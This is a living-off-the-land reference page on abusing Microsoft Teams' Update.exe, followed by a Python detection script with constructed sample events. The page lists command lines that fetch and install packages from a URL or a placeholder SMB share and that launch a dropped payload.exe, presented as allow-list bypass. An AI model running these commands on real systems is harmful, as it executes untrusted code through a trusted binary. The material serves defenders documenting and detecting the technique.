~/Privilege Escalation/Windows/Binaries# cat Update.exe.md

Binary used to update an installed NuGet/Squirrel package. It ships as part of the Microsoft Teams installation.

Paths:

%localappdata%\Microsoft\Teams\update.exe

Detection: Update.exe spawned an unknown process

Download

Update.exe contacts the given URL, looks for a RELEASES file there, and downloads the NuGet package.

Update.exe --download [url to package]

AWL bypass

Update.exe contacts the given URL, looks for a RELEASES file there, then downloads and installs the NuGet package.

Update.exe --update=[url to package]

Update.exe looks for a RELEASES file on the remote share, then downloads and installs the NuGet package over SMB (Samba).

Update.exe --update=\\remoteserver\payloadFolder

Update.exe contacts the given URL, looks for a RELEASES file there, then downloads and installs the NuGet package.

Update.exe --updateRollback=[url to package]

Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current. Then run the command. Update.exe will execute the file you copied.

Update.exe --processStart payload.exe --process-start-args "whatever args"

Update.exe looks for a RELEASES file on the remote share, then downloads and installs the NuGet package over SMB (Samba).

Update.exe --updateRollback=\\remoteserver\payloadFolder

Execute

Update.exe contacts the given URL, looks for a RELEASES file there, then downloads and installs the NuGet package.

Update.exe --update=[url to package]

Update.exe looks for a RELEASES file on the remote share, then downloads and installs the NuGet package over SMB (Samba).

Update.exe --update=\\remoteserver\payloadFolder

Update.exe contacts the given URL, looks for a RELEASES file there, then downloads and installs the NuGet package.

Update.exe --updateRollback=[url to package]

Update.exe looks for a RELEASES file on the remote share, then downloads and installs the NuGet package over SMB (Samba).

Update.exe --updateRollback=\\remoteserver\payloadFolder

Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current. Then run the command. Update.exe will execute the file you copied.

Update.exe --processStart payload.exe --process-start-args "whatever args"
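
The "Detection" line above, turned into a check over process-creation events. This is an added example, not part of the original page or of any Microsoft tooling. The event field names, the trusted update host and the expected --processStart target (Teams.exe) are assumptions, and the sample events are constructed.

```python
import re
from urllib.parse import urlparse

# Assumptions (not from the page): tune both sets to your environment.
TRUSTED_UPDATE_HOSTS = {"updates.example.internal"}  # placeholder host
EXPECTED_START_TARGETS = {"teams.exe"}  # binaries Update.exe may launch
SOURCE_FLAGS = ("--download", "--update", "--updateRollback")
# "--flag=value" or "--flag value"; value may be quoted, never another flag.
ARG_RE = re.compile(r'(--[A-Za-z-]+)(?:=|\s+)(?!--)(?:"([^"]*)"|(\S+))')

def parse_args(cmdline):
    """Map each value-carrying flag (lowercased) to its value."""
    return {m.group(1).lower(): m.group(2) if m.group(2) is not None else m.group(3)
            for m in ARG_RE.finditer(cmdline)}

def classify(event):
    """Return findings for one process-creation event (image, parent_image, cmdline)."""
    findings = []
    image, parent = event["image"].lower(), event["parent_image"].lower()
    if image.endswith("\\update.exe"):
        args = parse_args(event["cmdline"])
        for flag in SOURCE_FLAGS:
            src = args.get(flag.lower())
            if src is None:
                continue
            if src.startswith("\\\\"):  # UNC path: package pulled over SMB
                findings.append(f"{flag} from UNC path {src}")
            elif (urlparse(src).hostname or "") not in TRUSTED_UPDATE_HOSTS:
                findings.append(f"{flag} from untrusted source {src}")
        target = args.get("--processstart")
        if target and target.lower() not in EXPECTED_START_TARGETS:
            findings.append(f"--processStart of unexpected binary {target}")
    if parent.endswith("\\update.exe") and image.rsplit("\\", 1)[-1] not in EXPECTED_START_TARGETS:
        findings.append(f"Update.exe spawned unexpected child {event['image']}")
    return findings

TEAMS = r"C:\Users\a\AppData\Local\Microsoft\Teams"  # constructed sample path
EXPLORER = r"C:\Windows\explorer.exe"
UPDATE = TEAMS + r"\Update.exe"
SAMPLE_EVENTS = [  # constructed process-creation records, not real telemetry
    {"image": UPDATE, "parent_image": EXPLORER, "cmdline": 'Update.exe --processStart "Teams.exe"'},
    {"image": UPDATE, "parent_image": EXPLORER, "cmdline": "Update.exe --update=https://updates.example.internal/teams"},
    {"image": UPDATE, "parent_image": EXPLORER, "cmdline": r"Update.exe --update=\\remoteserver\payloadFolder"},
    {"image": UPDATE, "parent_image": EXPLORER, "cmdline": 'Update.exe --processStart payload.exe --process-start-args "whatever args"'},
    {"image": TEAMS + r"\current\payload.exe", "parent_image": UPDATE, "cmdline": "payload.exe whatever args"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["cmdline"], "->", classify(ev) or "ok")
```

The same logic maps onto Sysmon Event ID 1 or Windows Security 4688 records once their image, parent image and command-line fields are renamed to match.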